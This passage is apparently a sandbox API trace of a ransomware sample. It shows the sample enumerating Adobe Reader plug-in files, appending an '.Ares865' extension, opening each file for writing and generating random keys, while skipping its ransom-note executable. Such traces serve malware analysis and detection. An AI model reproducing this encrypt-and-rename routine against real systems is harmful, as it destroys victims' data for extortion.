FILES.exe") returned -1 [0170.435] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0170.435] lstrcpyW (in: lpString1=0x2cce472, lpString2="Accessibility.api" | out: lpString1="Accessibility.api") returned="Accessibility.api" [0170.435] lstrlenW (lpString="Accessibility.api") returned 17 [0170.435] lstrlenW (lpString="Ares865") returned 7 [0170.436] lstrcmpiW (lpString1="ity.api", lpString2="Ares865") returned 1 [0170.436] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Accessibility.api.Ares865") returned 82 [0170.436] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Accessibility.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\accessibility.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Accessibility.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\accessibility.api.ares865"), dwFlags=0x1) returned 1 [0170.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Accessibility.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\accessibility.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.438] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=519267) returned 1 [0170.438] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.439] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.439] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.461] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0170.462] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.469] lstrcpyW (in: lpString1=0x2cce472, lpString2="AcroForm" | out: lpString1="AcroForm") returned="AcroForm" [0170.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0170.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0170.469] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0170.469] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8308ce80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xae8a63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AcroForm.api", cAlternateFileName="")) returned 1 [0170.469] lstrcmpiW (lpString1="AcroForm.api", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0170.469] lstrcmpiW (lpString1="AcroForm.api", lpString2="aoldtz.exe") returned -1 [0170.469] lstrcpyW (in: lpString1=0x2cce472, lpString2="AcroForm.api" | out: lpString1="AcroForm.api") returned="AcroForm.api" [0170.470] lstrlenW (lpString="AcroForm.api") returned 12 [0170.470] lstrlenW (lpString="Ares865") returned 7 [0170.470] lstrcmpiW (lpString1="orm.api", lpString2="Ares865") returned 1 [0170.470] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api.Ares865") returned 77 [0170.470] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform.api.ares865"), dwFlags=0x1) returned 1 [0170.472] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.472] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11438691) returned 1 [0170.472] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.473] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.473] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.800] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0170.801] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.801] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.818] lstrcpyW (in: lpString1=0x2cce472, lpString2="AcroSign.prc" | out: lpString1="AcroSign.prc") returned="AcroSign.prc" [0170.819] lstrlenW (lpString="AcroSign.prc") returned 12 [0170.819] lstrlenW (lpString="Ares865") returned 7 [0170.819] lstrcmpiW (lpString1="ign.prc", lpString2="Ares865") returned 1 [0170.819] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc.Ares865") returned 77 [0170.819] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acrosign.prc"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acrosign.prc.ares865"), dwFlags=0x1) returned 1 [0170.822] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroSign.prc.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acrosign.prc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.823] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8574) returned 1 [0170.823] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.824] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.824] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.826] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0170.827] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0170.827] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0170.828] lstrcpyW (in: lpString1=0x2cce472, lpString2="Annotations" | out: lpString1="Annotations") returned="Annotations" [0170.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0170.828] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x336fc8 [0170.828] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0170.828] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5dbe63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Annots.api", cAlternateFileName="")) returned 1 [0170.828] lstrcmpiW (lpString1="Annots.api", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0170.828] lstrcmpiW (lpString1="Annots.api", lpString2="aoldtz.exe") returned -1 [0170.828] lstrcpyW (in: lpString1=0x2cce472, lpString2="Annots.api" | out: lpString1="Annots.api") returned="Annots.api" [0170.828] lstrlenW (lpString="Annots.api") returned 10 [0170.828] lstrlenW (lpString="Ares865") returned 7 [0170.828] lstrcmpiW (lpString1="ots.api", lpString2="Ares865") returned 1 [0170.829] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api.Ares865") returned 75 [0170.829] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annots.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annots.api.ares865"), dwFlags=0x1) returned 1 [0170.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annots.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0170.832] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6143587) returned 1 [0170.832] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0170.833] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0170.833] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.155] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.155] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.156] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.182] lstrcpyW (in: lpString1=0x2cce472, lpString2="Checkers.api" | out: lpString1="Checkers.api") returned="Checkers.api" [0171.182] lstrlenW (lpString="Checkers.api") returned 12 [0171.182] lstrlenW (lpString="Ares865") returned 7 [0171.182] lstrcmpiW (lpString1="ers.api", lpString2="Ares865") returned 1 [0171.182] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api.Ares865") returned 77 [0171.182] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\checkers.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\checkers.api.ares865"), dwFlags=0x1) returned 1 [0171.186] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\checkers.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.186] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=861283) returned 1 [0171.187] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.187] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.187] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.232] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.233] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.233] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.244] lstrcpyW (in: lpString1=0x2cce472, lpString2="DigSig.api" | out: lpString1="DigSig.api") returned="DigSig.api" [0171.244] lstrlenW (lpString="DigSig.api") returned 10 [0171.244] lstrlenW (lpString="Ares865") returned 7 [0171.244] lstrcmpiW (lpString1="Sig.api", lpString2="Ares865") returned 1 [0171.244] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api.Ares865") returned 75 [0171.245] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\digsig.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\digsig.api.ares865"), dwFlags=0x1) returned 1 [0171.249] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\digsig.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.249] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1433187) returned 1 [0171.249] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.250] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.250] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.322] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.323] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.323] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.342] lstrcpyW (in: lpString1=0x2cce472, lpString2="DVA.api" | out: lpString1="DVA.api") returned="DVA.api" [0171.342] lstrlenW (lpString="DVA.api") returned 7 [0171.342] lstrlenW (lpString="Ares865") returned 7 [0171.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api.Ares865") returned 72 [0171.343] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\dva.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\dva.api.ares865"), dwFlags=0x1) returned 1 [0171.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\dva.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.347] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=150115) returned 1 [0171.347] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.348] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.348] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.356] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.357] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.357] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.359] lstrcpyW (in: lpString1=0x2cce472, lpString2="eBook.api" | out: lpString1="eBook.api") returned="eBook.api" [0171.359] lstrlenW (lpString="eBook.api") returned 9 [0171.359] lstrlenW (lpString="Ares865") returned 7 [0171.359] lstrcmpiW (lpString1="ook.api", lpString2="Ares865") returned 1 [0171.359] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api.Ares865") returned 74 [0171.359] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ebook.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ebook.api.ares865"), dwFlags=0x1) returned 1 [0171.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ebook.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.363] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=53347) returned 1 [0171.363] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.364] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.364] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.368] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.370] lstrcpyW (in: lpString1=0x2cce472, lpString2="EScript.api" | out: lpString1="EScript.api") returned="EScript.api" [0171.370] lstrlenW (lpString="EScript.api") returned 11 [0171.370] lstrlenW (lpString="Ares865") returned 7 [0171.370] lstrcmpiW (lpString1="ipt.api", lpString2="Ares865") returned 1 [0171.370] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api.Ares865") returned 76 [0171.370] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\escript.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\escript.api.ares865"), dwFlags=0x1) returned 1 [0171.373] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\escript.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.373] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1751139) returned 1 [0171.374] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.374] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.374] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.461] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.462] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.485] lstrcpyW (in: lpString1=0x2cce472, lpString2="IA32.api" | out: lpString1="IA32.api") returned="IA32.api" [0171.485] lstrlenW (lpString="IA32.api") returned 8 [0171.485] lstrlenW (lpString="Ares865") returned 7 [0171.485] lstrcmpiW (lpString1="A32.api", lpString2="Ares865") returned -1 [0171.485] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api.Ares865") returned 73 [0171.485] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ia32.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ia32.api.ares865"), dwFlags=0x1) returned 1 [0171.489] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ia32.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.489] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=99427) returned 1 [0171.490] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.490] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.491] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.508] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.509] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.509] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.511] lstrcpyW (in: lpString1=0x2cce472, lpString2="MakeAccessible.api" | out: lpString1="MakeAccessible.api") returned="MakeAccessible.api" [0171.511] lstrlenW (lpString="MakeAccessible.api") returned 18 [0171.511] lstrlenW (lpString="Ares865") returned 7 [0171.511] lstrcmpiW (lpString1="ble.api", lpString2="Ares865") returned 1 [0171.511] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api.Ares865") returned 83 [0171.511] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\makeaccessible.api"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\makeaccessible.api.ares865"), dwFlags=0x1) returned 1 [0171.515] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\MakeAccessible.api.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\makeaccessible.api.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0171.515] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2312803) returned 1 [0171.515] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0171.526] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0171.526] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0171.824] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0171.825] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0171.825] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 